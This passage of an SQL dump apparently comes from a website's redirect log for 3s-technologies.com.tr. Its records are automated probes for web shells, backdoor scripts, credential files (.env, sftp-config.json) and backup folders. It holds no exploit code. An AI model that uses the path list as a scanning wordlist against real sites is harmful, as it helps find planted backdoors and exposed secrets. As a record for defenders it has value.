00:00:00',301),(49923,'http://3s-technologies.com.tr/en/wp-admin/js/wp-login.php',NULL,'https://www.google.de/','',20,0,'2025-11-26 08:22:46','0000-00-00 00:00:00',301),(49924,'http://3s-technologies.com.tr/en/wp-admin/maint/index.php',NULL,'https://www.yahoo.com/','',8,0,'2025-11-26 08:22:48','0000-00-00 00:00:00',301),(49925,'http://3s-technologies.com.tr/en/wp-content/admin.php',NULL,'https://www.google.co.uk/','',130,0,'2025-11-26 08:22:49','0000-00-00 00:00:00',301),(49926,'http://3s-technologies.com.tr/en/wp-content/autoload_classmap.php',NULL,'https://www.yahoo.com/','',68,0,'2025-11-26 08:22:50','0000-00-00 00:00:00',301),(49927,'http://3s-technologies.com.tr/en/wp-content/plugins/admin.php',NULL,'https://www.google.co.uk/','',149,0,'2025-11-26 08:22:53','0000-00-00 00:00:00',301),(49928,'http://3s-technologies.com.tr/en/wp-content/plugins/clara/clara.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:22:54','0000-00-00 00:00:00',301),(49929,'http://3s-technologies.com.tr/en/wp-content/plugins/core-econ/uph.php',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:22:55','0000-00-00 00:00:00',301),(49930,'http://3s-technologies.com.tr/en/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'https://www.google.de/','',13,0,'2025-11-26 08:22:56','0000-00-00 00:00:00',301),(49931,'http://3s-technologies.com.tr/en/wp-content/plugins/index.php',NULL,'https://www.google.de/','',17,0,'2025-11-26 08:22:56','0000-00-00 00:00:00',301),(49932,'http://3s-technologies.com.tr/en/wp-content/plugins/pwnd-1/pwnd.php',NULL,'https://www.yahoo.com/','',3,0,'2025-11-26 08:22:57','0000-00-00 00:00:00',301),(49933,'http://3s-technologies.com.tr/en/wp-content/plugins/pwnd/pwnd.php',NULL,'https://www.google.fr/','',19,0,'2025-11-26 08:22:58','0000-00-00 00:00:00',301),(49934,'http://3s-technologies.com.tr/en/wp-content/plugins/shell/noimg.php',NULL,'https://www.google.fr/','',1,0,'2025-11-26 08:22:59','0000-00-00 00:00:00',301),(49935,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresscore/cong.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:23:00','0000-00-00 00:00:00',301),(49936,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-conflg.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:23:01','0000-00-00 00:00:00',301),(49937,'http://3s-technologies.com.tr/en/wp-content/themes/about.php',NULL,'https://www.bing.com/','',72,0,'2025-11-26 08:23:03','0000-00-00 00:00:00',301),(49938,'http://3s-technologies.com.tr/en/wp-content/themes/admin.php',NULL,'https://www.google.com/','',138,0,'2025-11-26 08:23:04','0000-00-00 00:00:00',301),(49939,'http://3s-technologies.com.tr/en/wp-content/themes/index.php',NULL,'https://www.google.fr/','',13,0,'2025-11-26 08:23:05','0000-00-00 00:00:00',301),(49940,'http://3s-technologies.com.tr/en/wp-content/themes/themes.php',NULL,'https://www.yahoo.com/','',11,0,'2025-11-26 08:23:05','0000-00-00 00:00:00',301),(49941,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentytwo/index.php',NULL,'https://duckduckgo.com/','',15,0,'2025-11-26 08:23:07','0000-00-00 00:00:00',301),(49942,'http://3s-technologies.com.tr/en/wp-content/uploads/de_fb_uploads/b.php',NULL,'https://www.google.co.uk/','',3,0,'2025-11-26 08:23:09','0000-00-00 00:00:00',301),(49943,'http://3s-technologies.com.tr/en/wp-includes/404.php',NULL,'https://www.google.co.uk/','',3,0,'2025-11-26 08:23:13','0000-00-00 00:00:00',301),(49944,'http://3s-technologies.com.tr/en/wp-includes/assets/autoload_classmap.php',NULL,'https://www.google.fr/','',101,0,'2025-11-26 08:23:15','0000-00-00 00:00:00',301),(49945,'http://3s-technologies.com.tr/en/wp-includes/assets/index.php',NULL,'https://www.google.de/','',39,0,'2025-11-26 08:23:16','0000-00-00 00:00:00',301),(49946,'http://3s-technologies.com.tr/en/wp-includes/bk/index.php',NULL,'https://www.bing.com/','',66,0,'2025-11-26 08:23:17','0000-00-00 00:00:00',301),(49947,'http://3s-technologies.com.tr/en/wp-includes/block-bindings',NULL,'https://duckduckgo.com/','',106,0,'2025-11-26 08:23:17','0000-00-00 00:00:00',301),(49948,'http://3s-technologies.com.tr/en/wp-includes/blocks/shortcode/index.php',NULL,'https://duckduckgo.com/','',16,0,'2025-11-26 08:23:18','0000-00-00 00:00:00',301),(49949,'http://3s-technologies.com.tr/en/wp-includes/css/dist/widgets/about.php',NULL,'https://www.bing.com/','',3,0,'2025-11-26 08:23:21','0000-00-00 00:00:00',301),(49950,'http://3s-technologies.com.tr/en/wp-includes/fonts/about.php',NULL,'https://duckduckgo.com/','',6,0,'2025-11-26 08:23:23','0000-00-00 00:00:00',301),(49951,'http://3s-technologies.com.tr/en/wp-includes/fonts/admin.php',NULL,'https://www.google.de/','',30,0,'2025-11-26 08:23:23','0000-00-00 00:00:00',301),(49952,'http://3s-technologies.com.tr/en/wp-includes/ixr/admin.php',NULL,'https://www.google.fr/','',1,0,'2025-11-26 08:23:29','0000-00-00 00:00:00',301),(49953,'http://3s-technologies.com.tr/en/wp-includes/ixr/autoload_classmap.php',NULL,'https://www.bing.com/','',1,0,'2025-11-26 08:23:30','0000-00-00 00:00:00',301),(49954,'http://3s-technologies.com.tr/en/wp-includes/ixr/index.php',NULL,'https://www.google.com/','',32,0,'2025-11-26 08:23:30','0000-00-00 00:00:00',301),(49955,'http://3s-technologies.com.tr/en/wp-includes/js/jcrop/jcrop.php',NULL,'https://www.google.fr/','',13,0,'2025-11-26 08:23:32','0000-00-00 00:00:00',301),(49956,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-conflg.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:23:33','0000-00-00 00:00:00',301),(49957,'http://3s-technologies.com.tr/en/wp-includes/simplepie/autoload_classmap.php',NULL,'https://www.google.com/','',91,0,'2025-11-26 08:23:42','0000-00-00 00:00:00',301),(49958,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/autoload_classmap.php',NULL,'https://duckduckgo.com/','',101,0,'2025-11-26 08:23:45','0000-00-00 00:00:00',301),(49959,'http://3s-technologies.com.tr/en/wp-includes/style-engine/about.php',NULL,'https://www.google.co.uk/','',6,0,'2025-11-26 08:23:48','0000-00-00 00:00:00',301),(49960,'http://3s-technologies.com.tr/en/wp-includes/text/autoload_classmap.php',NULL,'https://www.google.co.uk/','',22,0,'2025-11-26 08:23:49','0000-00-00 00:00:00',301),(49961,'http://3s-technologies.com.tr/en/.well-known/about/function.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:23:56','0000-00-00 00:00:00',301),(49962,'http://3s-technologies.com.tr/en/.well-known/apple-app-site-association',NULL,'https://www.google.fr/','',2,0,'2025-11-26 08:23:57','0000-00-00 00:00:00',301),(49963,'http://3s-technologies.com.tr/en/.well-known/classwithtostring.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:23:58','0000-00-00 00:00:00',301),(49964,'http://3s-technologies.com.tr/en/admin/function.php',NULL,'https://www.yahoo.com/','',28,0,'2025-11-26 08:24:12','0000-00-00 00:00:00',301),(49965,'http://3s-technologies.com.tr/en/admin/index.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:24:13','0000-00-00 00:00:00',301),(49966,'http://3s-technologies.com.tr/en/file/function.php',NULL,'https://www.yahoo.com/','',3,0,'2025-11-26 08:24:19','0000-00-00 00:00:00',301),(49967,'http://3s-technologies.com.tr/en/files/index.php',NULL,'https://www.google.co.uk/','',12,0,'2025-11-26 08:24:19','0000-00-00 00:00:00',301),(49968,'http://3s-technologies.com.tr/en/fix.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:24:20','0000-00-00 00:00:00',301),(49969,'http://3s-technologies.com.tr/en/goat.php',NULL,'https://duckduckgo.com/','',5,0,'2025-11-26 08:24:25','0000-00-00 00:00:00',301),(49970,'http://3s-technologies.com.tr/en/inc.php',NULL,'https://www.google.co.uk/','',10,0,'2025-11-26 08:24:26','0000-00-00 00:00:00',301),(49971,'http://3s-technologies.com.tr/en/index.bak.php',NULL,'https://www.yahoo.com/','',8,0,'2025-11-26 08:24:27','0000-00-00 00:00:00',301),(49972,'http://3s-technologies.com.tr/en/index/function.php',NULL,'https://www.google.com/','',73,0,'2025-11-26 08:24:28','0000-00-00 00:00:00',301),(49973,'http://3s-technologies.com.tr/en/infos.php',NULL,'https://www.google.de/','',4,0,'2025-11-26 08:24:28','0000-00-00 00:00:00',301),(49974,'http://3s-technologies.com.tr/en/mm.php',NULL,'https://www.bing.com/','',10,0,'2025-11-26 08:24:37','0000-00-00 00:00:00',301),(49975,'http://3s-technologies.com.tr/en/ms-edit.php',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:24:57','0000-00-00 00:00:00',301),(49976,'http://3s-technologies.com.tr/en/ms-themes.php',NULL,'https://www.bing.com/','',1,0,'2025-11-26 08:24:57','0000-00-00 00:00:00',301),(49977,'http://3s-technologies.com.tr/en/options-general.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:24:59','0000-00-00 00:00:00',301),(49978,'http://3s-technologies.com.tr/en/options-reading.php',NULL,'https://www.google.fr/','',31,0,'2025-11-26 08:25:00','0000-00-00 00:00:00',301),(49979,'http://3s-technologies.com.tr/en/options-writing.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:25:04','0000-00-00 00:00:00',301),(49980,'http://3s-technologies.com.tr/en/pages.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:25:05','0000-00-00 00:00:00',301),(49981,'http://3s-technologies.com.tr/en/setup.php',NULL,'https://www.bing.com/','',1,0,'2025-11-26 08:25:06','0000-00-00 00:00:00',301),(49982,'http://3s-technologies.com.tr/en/shop.php',NULL,'https://duckduckgo.com/','',8,0,'2025-11-26 08:25:07','0000-00-00 00:00:00',301),(49983,'http://3s-technologies.com.tr/en/ty.php',NULL,'https://www.google.com/','',2,0,'2025-11-26 08:25:12','0000-00-00 00:00:00',301),(49984,'http://3s-technologies.com.tr/en/user/.env',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:25:15','0000-00-00 00:00:00',301),(49985,'http://3s-technologies.com.tr/en/users.php',NULL,'https://www.google.de/','',4,0,'2025-11-26 08:25:16','0000-00-00 00:00:00',301),(49986,'http://3s-technologies.com.tr/en/web.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:25:18','0000-00-00 00:00:00',301),(49987,'http://3s-technologies.com.tr/en/wp-activat.php',NULL,'https://www.yahoo.com/','',2,0,'2025-11-26 08:25:19','0000-00-00 00:00:00',301),(49988,'http://3s-technologies.com.tr/en/wp-admin/admin.php',NULL,'https://www.google.de/','',5,0,'2025-11-26 08:25:20','0000-00-00 00:00:00',301),(49989,'http://3s-technologies.com.tr/en/wp-admin/classwithtostring.php',NULL,'https://www.google.co.uk/','',111,0,'2025-11-26 08:25:20','0000-00-00 00:00:00',301),(49990,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/about.php',NULL,'https://www.google.fr/','',3,0,'2025-11-26 08:25:22','0000-00-00 00:00:00',301),(49991,'http://3s-technologies.com.tr/en/wp-admin/css/colors/light/wp-login.php',NULL,'https://duckduckgo.com/','',4,0,'2025-11-26 08:25:23','0000-00-00 00:00:00',301),(49992,'http://3s-technologies.com.tr/en/wp-admin/images/moon.php',NULL,'https://www.google.com/','',4,0,'2025-11-26 08:25:25','0000-00-00 00:00:00',301),(49993,'http://3s-technologies.com.tr/en/wp-admin/includes/colour.php',NULL,'https://www.google.fr/','',108,0,'2025-11-26 08:25:26','0000-00-00 00:00:00',301),(49994,'http://3s-technologies.com.tr/en/wp-admin/includes/header.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:25:27','0000-00-00 00:00:00',301),(49995,'http://3s-technologies.com.tr/en/wp-admin/includes/index.php',NULL,'https://www.bing.com/','',73,0,'2025-11-26 08:25:28','0000-00-00 00:00:00',301),(49996,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/cloud.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:25:29','0000-00-00 00:00:00',301),(49997,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/index.php',NULL,'https://www.google.fr/','',29,0,'2025-11-26 08:25:30','0000-00-00 00:00:00',301),(49998,'http://3s-technologies.com.tr/en/wp-admin/mah.php',NULL,'https://www.bing.com/','',8,0,'2025-11-26 08:25:31','0000-00-00 00:00:00',301),(49999,'http://3s-technologies.com.tr/en/wp-admin/network/network.php',NULL,'https://www.google.fr/','',1,0,'2025-11-26 08:25:34','0000-00-00 00:00:00',301),(50000,'http://3s-technologies.com.tr/en/wp-admin/wp-admins.php',NULL,'https://www.google.co.uk/','',72,0,'2025-11-26 08:25:36','0000-00-00 00:00:00',301),(50001,'http://3s-technologies.com.tr/en/wp-admin/wp-login.php',NULL,'https://www.google.fr/','',3,0,'2025-11-26 08:25:36','0000-00-00 00:00:00',301),(50002,'http://3s-technologies.com.tr/en/wp-api.php',NULL,'https://www.yahoo.com/','',2,0,'2025-11-26 08:25:38','0000-00-00 00:00:00',301),(50003,'http://3s-technologies.com.tr/en/wp-comments.php',NULL,'https://www.google.co.uk/','',8,0,'2025-11-26 08:25:40','0000-00-00 00:00:00',301),(50004,'http://3s-technologies.com.tr/en/wp-content/classwithtostring.php',NULL,'https://www.yahoo.com/','',61,0,'2025-11-26 08:25:44','0000-00-00 00:00:00',301),(50005,'http://3s-technologies.com.tr/en/wp-content/click.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:25:44','0000-00-00 00:00:00',301),(50006,'http://3s-technologies.com.tr/en/wp-content/languages/autoload_classmap.php',NULL,'https://www.google.co.uk/','',11,0,'2025-11-26 08:25:45','0000-00-00 00:00:00',301),(50007,'http://3s-technologies.com.tr/en/wp-content/plugin.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:25:46','0000-00-00 00:00:00',301),(50008,'http://3s-technologies.com.tr/en/wp-content/plugins/autoload_classmap.php',NULL,'https://www.google.fr/','',7,0,'2025-11-26 08:25:47','0000-00-00 00:00:00',301),(50009,'http://3s-technologies.com.tr/en/wp-content/plugins/ioxi/ioxi/dropdown.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:25:48','0000-00-00 00:00:00',301),(50010,'http://3s-technologies.com.tr/en/wp-content/plugins/pwnd/as.php',NULL,'https://www.bing.com/','',73,0,'2025-11-26 08:25:49','0000-00-00 00:00:00',301),(50011,'http://3s-technologies.com.tr/en/wp-content/plugins/up/main.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:25:50','0000-00-00 00:00:00',301),(50012,'http://3s-technologies.com.tr/en/wp-content/uploads/chosen.php',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:25:53','0000-00-00 00:00:00',301),(50013,'http://3s-technologies.com.tr/en/wp-content/uploads/json.php',NULL,'https://www.google.de/','',5,0,'2025-11-26 08:25:54','0000-00-00 00:00:00',301),(50014,'http://3s-technologies.com.tr/en/wp-error.php',NULL,'https://www.bing.com/','',5,0,'2025-11-26 08:25:56','0000-00-00 00:00:00',301),(50015,'http://3s-technologies.com.tr/en/wp-files.php',NULL,'https://duckduckgo.com/','',3,0,'2025-11-26 08:25:57','0000-00-00 00:00:00',301),(50016,'http://3s-technologies.com.tr/en/wp-includes/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:25:58','0000-00-00 00:00:00',301),(50017,'http://3s-technologies.com.tr/en/wp-includes/blocks/about.php',NULL,'https://www.bing.com/','',6,0,'2025-11-26 08:25:59','0000-00-00 00:00:00',301),(50018,'http://3s-technologies.com.tr/en/wp-includes/blocks/calendar/index.php',NULL,'https://www.google.co.uk/','',33,0,'2025-11-26 08:26:00','0000-00-00 00:00:00',301),(50019,'http://3s-technologies.com.tr/en/wp-includes/blocks/site-title/index.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:26:05','0000-00-00 00:00:00',301),(50020,'http://3s-technologies.com.tr/en/wp-includes/certificates/chosen.php',NULL,'https://www.google.co.uk/','',11,0,'2025-11-26 08:26:06','0000-00-00 00:00:00',301),(50021,'http://3s-technologies.com.tr/en/wp-includes/css/autoload_classmap.php',NULL,'https://www.yahoo.com/','',74,0,'2025-11-26 08:26:07','0000-00-00 00:00:00',301),(50022,'http://3s-technologies.com.tr/en/wp-includes/fonts/autoload_classmap.php',NULL,'https://duckduckgo.com/','',40,0,'2025-11-26 08:26:07','0000-00-00 00:00:00',301),(50023,'http://3s-technologies.com.tr/en/wp-includes/html-api/about.php',NULL,'https://www.google.co.uk/','',8,0,'2025-11-26 08:26:08','0000-00-00 00:00:00',301),(50024,'http://3s-technologies.com.tr/en/wp-includes/ixr/chosen.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:26:10','0000-00-00 00:00:00',301),(50025,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/langs/about.php',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:26:10','0000-00-00 00:00:00',301),(50026,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/file.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:26:11','0000-00-00 00:00:00',301),(50027,'http://3s-technologies.com.tr/en/wp-includes/rest-api/index.php',NULL,'https://www.google.co.uk/','',50,0,'2025-11-26 08:26:12','0000-00-00 00:00:00',301),(50028,'http://3s-technologies.com.tr/en/wp-includes/simplepie/chosen.php',NULL,'https://www.bing.com/','',47,0,'2025-11-26 08:26:12','0000-00-00 00:00:00',301),(50029,'http://3s-technologies.com.tr/en/wp-includes/style-engine/autoload_classmap.php',NULL,'https://www.google.co.uk/','',74,0,'2025-11-26 08:26:13','0000-00-00 00:00:00',301),(50030,'http://3s-technologies.com.tr/en/wp-includes/text/wp-conflg.php',NULL,'https://www.google.co.uk/','',11,0,'2025-11-26 08:26:14','0000-00-00 00:00:00',301),(50031,'http://3s-technologies.com.tr/en/wp-includes/widgets/autoload_classmap.php',NULL,'https://www.google.de/','',61,0,'2025-11-26 08:26:14','0000-00-00 00:00:00',301),(50032,'http://3s-technologies.com.tr/en/wp-includes/widgets/include.php',NULL,'https://www.google.co.uk/','',3,0,'2025-11-26 08:26:15','0000-00-00 00:00:00',301),(50033,'http://3s-technologies.com.tr/en/wp-l0gin.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:26:18','0000-00-00 00:00:00',301),(50034,'http://3s-technologies.com.tr/en/wp-logs.php',NULL,'https://www.google.co.uk/','',2,0,'2025-11-26 08:26:18','0000-00-00 00:00:00',301),(50035,'http://3s-technologies.com.tr/en/wp-setting.php',NULL,'https://www.google.fr/','',1,0,'2025-11-26 08:26:19','0000-00-00 00:00:00',301),(50036,'http://3s-technologies.com.tr/en/wp-setup.php',NULL,'https://www.bing.com/','',7,0,'2025-11-26 08:26:20','0000-00-00 00:00:00',301),(50037,'http://3s-technologies.com.tr/en/wsa.php',NULL,'https://www.google.com/','',5,0,'2025-11-26 08:26:23','0000-00-00 00:00:00',301),(50038,'http://3s-technologies.com.tr/en/bv3.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:26:28','0000-00-00 00:00:00',301),(50039,'http://3s-technologies.com.tr/en/cfile.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:26:29','0000-00-00 00:00:00',301),(50040,'http://3s-technologies.com.tr/en/class9.php',NULL,'https://duckduckgo.com/','',2,0,'2025-11-26 08:26:31','0000-00-00 00:00:00',301),(50041,'http://3s-technologies.com.tr/en/dex.php',NULL,'https://www.google.com/','',8,0,'2025-11-26 08:26:31','0000-00-00 00:00:00',301),(50042,'http://3s-technologies.com.tr/en/ffile.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:26:32','0000-00-00 00:00:00',301),(50043,'http://3s-technologies.com.tr/en/file17.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:26:33','0000-00-00 00:00:00',301),(50044,'http://3s-technologies.com.tr/en/file5.php',NULL,'https://www.yahoo.com/','',27,0,'2025-11-26 08:26:35','0000-00-00 00:00:00',301),(50045,'http://3s-technologies.com.tr/en/file7.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:26:36','0000-00-00 00:00:00',301),(50046,'http://3s-technologies.com.tr/en/file8.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:26:37','0000-00-00 00:00:00',301),(50047,'http://3s-technologies.com.tr/en/gfile.php',NULL,'https://www.google.de/','',9,0,'2025-11-26 08:26:38','0000-00-00 00:00:00',301),(50048,'http://3s-technologies.com.tr/en/great.php',NULL,'https://www.google.fr/','',2,0,'2025-11-26 08:26:38','0000-00-00 00:00:00',301),(50049,'http://3s-technologies.com.tr/en/images/class.api.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:26:40','0000-00-00 00:00:00',301),(50050,'http://3s-technologies.com.tr/en/view.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-26 08:26:40','0000-00-00 00:00:00',301),(50051,'http://3s-technologies.com.tr/en/wp-content/class.api.php',NULL,'https://www.google.fr/','',3,0,'2025-11-26 08:26:41','0000-00-00 00:00:00',301),(50052,'http://3s-technologies.com.tr/en/wp-content/plugins/hellodollyv2',NULL,'https://www.bing.com/','',11,0,'2025-11-26 08:26:43','0000-00-00 00:00:00',301),(50053,'http://3s-technologies.com.tr/en/wp-content/themes/hello_dolly_v2.php',NULL,'https://www.bing.com/','',1,0,'2025-11-26 08:26:46','0000-00-00 00:00:00',301),(50054,'http://3s-technologies.com.tr/en/wp-includes/class.api.php',NULL,'https://www.google.com/','',1,0,'2025-11-26 08:26:49','0000-00-00 00:00:00',301),(50055,'http://3s-technologies.com.tr/en/wp-includes/style-engine/wp-conflg.php',NULL,'https://www.bing.com/','',72,0,'2025-11-26 08:27:03','0000-00-00 00:00:00',301),(50056,'http://3s-technologies.com.tr/en/wp-mn.php',NULL,'https://www.google.fr/','',1,0,'2025-11-26 08:27:06','0000-00-00 00:00:00',301),(50057,'http://3s-technologies.com.tr/en/wp-update.php',NULL,'https://www.google.co.uk/','',10,0,'2025-11-26 08:27:07','0000-00-00 00:00:00',301),(50058,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/xa.php',NULL,'https://www.google.co.uk/','',7,0,'2025-11-26 23:33:19','0000-00-00 00:00:00',301),(50059,'http://3s-technologies.com.tr/en/wp-admin/css/colors/light/function.php',NULL,'https://www.yahoo.com/','',7,0,'2025-11-26 23:34:07','0000-00-00 00:00:00',301),(50060,'http://3s-technologies.com.tr/en/wp-content/geforce.php',NULL,'https://www.google.de/','',7,0,'2025-11-26 23:34:21','0000-00-00 00:00:00',301),(50061,'http://3s-technologies.com.tr/en/wp-content/uploads/geforce.php',NULL,'https://www.google.com/','',10,0,'2025-11-26 23:34:33','0000-00-00 00:00:00',301),(50062,'http://3s-technologies.com.tr/en/wp-includes/ixr/test1.php',NULL,'https://www.yahoo.com/','',18,0,'2025-11-26 23:34:37','0000-00-00 00:00:00',301),(50063,'http://3s-technologies.com.tr/en/wp-includes/requests/index.php',NULL,'https://www.bing.com/','',50,0,'2025-11-26 23:34:39','0000-00-00 00:00:00',301),(50064,'http://3s-technologies.com.tr/en/wp-includes/simplepie/index.php',NULL,'https://www.google.co.uk/','',71,0,'2025-11-26 23:34:43','0000-00-00 00:00:00',301),(50065,'http://3s-technologies.com.tr/en/wp-includes/text/diff/index.php',NULL,'https://www.bing.com/','',25,0,'2025-11-26 23:34:47','0000-00-00 00:00:00',301),(50066,'http://3s-technologies.com.tr/en/wp-includes/css/dist/alam.php',NULL,'https://www.google.com/','',10,0,'2025-11-26 23:34:55','0000-00-00 00:00:00',301),(50067,'http://3s-technologies.com.tr/en/wp-includes/customize/index.php',NULL,'https://www.google.fr/','',41,0,'2025-11-26 23:34:57','0000-00-00 00:00:00',301),(50068,'http://3s-technologies.com.tr/en/wp-content/cache',NULL,'https://www.yahoo.com/','',23,0,'2025-11-26 23:34:57','0000-00-00 00:00:00',301),(50069,'http://3s-technologies.com.tr/en/wp-content/w3tc',NULL,'https://www.bing.com/','',22,0,'2025-11-26 23:34:58','0000-00-00 00:00:00',301),(50070,'http://3s-technologies.com.tr/en/wp-content/et-cache',NULL,'https://www.google.fr/','',51,0,'2025-11-26 23:34:59','0000-00-00 00:00:00',301),(50071,'http://3s-technologies.com.tr/en/wp-content/cache/supercache',NULL,'https://www.yahoo.com/','',24,0,'2025-11-26 23:34:59','0000-00-00 00:00:00',301),(50072,'http://3s-technologies.com.tr/en/wp-content/wflogs',NULL,'https://www.yahoo.com/','',25,0,'2025-11-26 23:35:00','0000-00-00 00:00:00',301),(50073,'http://3s-technologies.com.tr/en/wp-content/updraft',NULL,'https://www.google.de/','',25,0,'2025-11-26 23:35:00','0000-00-00 00:00:00',301),(50074,'http://3s-technologies.com.tr/en/wp-content/ai1wm-backups',NULL,'https://www.google.fr/','',25,0,'2025-11-26 23:35:01','0000-00-00 00:00:00',301),(50075,'http://3s-technologies.com.tr/en/wp-content/backups-dup-lite',NULL,'https://www.google.de/','',69,0,'2025-11-26 23:35:02','0000-00-00 00:00:00',301),(50076,'http://3s-technologies.com.tr/en/wp-content/backup-db',NULL,'https://www.google.co.uk/','',25,0,'2025-11-26 23:35:02','0000-00-00 00:00:00',301),(50077,'http://3s-technologies.com.tr/en/wp-content/uploads/woocommerce_uploads',NULL,'https://www.google.co.uk/','',11,0,'2025-11-26 23:35:03','0000-00-00 00:00:00',301),(50078,'http://3s-technologies.com.tr/en/wp-content/uploads/woocommerce',NULL,'https://www.google.co.uk/','',10,0,'2025-11-26 23:35:03','0000-00-00 00:00:00',301),(50079,'http://3s-technologies.com.tr/en/wp-content/uploads/wc-logs',NULL,'https://www.google.com/','',11,0,'2025-11-26 23:35:04','0000-00-00 00:00:00',301),(50080,'http://3s-technologies.com.tr/en/wp-includes/images/index.php',NULL,'https://duckduckgo.com/','',34,0,'2025-11-26 23:35:18','0000-00-00 00:00:00',301),(50081,'http://3s-technologies.com.tr/en/wp-includes/images/media/index.php',NULL,'https://www.bing.com/','',15,0,'2025-11-26 23:35:19','0000-00-00 00:00:00',301),(50082,'http://3s-technologies.com.tr/en/wp-includes/index.php',NULL,'https://www.bing.com/','',93,0,'2025-11-26 23:35:21','0000-00-00 00:00:00',301),(50083,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/index.php',NULL,'https://www.bing.com/','',12,0,'2025-11-26 23:35:32','0000-00-00 00:00:00',301),(50084,'https://3s-technologies.com.tr/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2025-11-27 18:51:41','0000-00-00 00:00:00',301),(50085,'https://3s-technologies.com.tr/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2025-11-27 18:51:42','0000-00-00 00:00:00',301),(50086,'http://3s-technologies.com.tr/en/oyhrknwp.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-11-27 18:51:43','0000-00-00 00:00:00',301),(50087,'https://www.3s-technologies.com.tr/tr/images/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/images/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',1,0,'2025-11-28 18:40:45','0000-00-00 00:00:00',301),(50088,'http://3s-technologies.com.tr/tr/xcloner.php',NULL,'','',1,0,'2025-11-28 20:04:31','0000-00-00 00:00:00',301),(50089,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php',NULL,'','',2,0,'2025-11-29 18:25:50','0000-00-00 00:00:00',301),(50090,'http://3s-technologies.com.tr/en/sftp-config.json',NULL,'www.google.com','',2,0,'2025-11-29 21:45:56','0000-00-00 00:00:00',301),(50091,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/wp-is.php',NULL,'','',7,0,'2025-11-29 22:58:18','0000-00-00 00:00:00',301),(50092,'http://mail.3s-technologies.com.tr/tr/wp-admin/admin-post.php',NULL,'','',9,0,'2025-11-29 22:58:20','0000-00-00 00:00:00',301),(50093,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colour.php',NULL,'','',8,0,'2025-11-29 22:58:24','0000-00-00 00:00:00',301),(50094,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/index.php',NULL,'','',8,0,'2025-11-29 22:58:27','0000-00-00 00:00:00',301),(50095,'http://mail.3s-technologies.com.tr/tr/menu.phphttps:/robertatimothy.com/wp-content/packed.php',NULL,'','',2,0,'2025-11-29 22:58:29','0000-00-00 00:00:00',301),(50096,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/sketch/404.php',NULL,'','',6,0,'2025-11-29 22:58:30','0000-00-00 00:00:00',301),(50097,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/index.php',NULL,'','',35,0,'2025-11-29 22:59:23','0000-00-00 00:00:00',301),(50098,'http://mail.3s-technologies.com.tr/tr/static/sallu.php',NULL,'','',2,0,'2025-11-29 22:59:27','0000-00-00 00:00:00',301),(50099,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/wp-conflg.php',NULL,'','',11,0,'2025-11-29 22:59:56','0000-00-00 00:00:00',301),(50100,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rnepv9.php',NULL,'','',6,0,'2025-11-29 22:59:59','0000-00-00 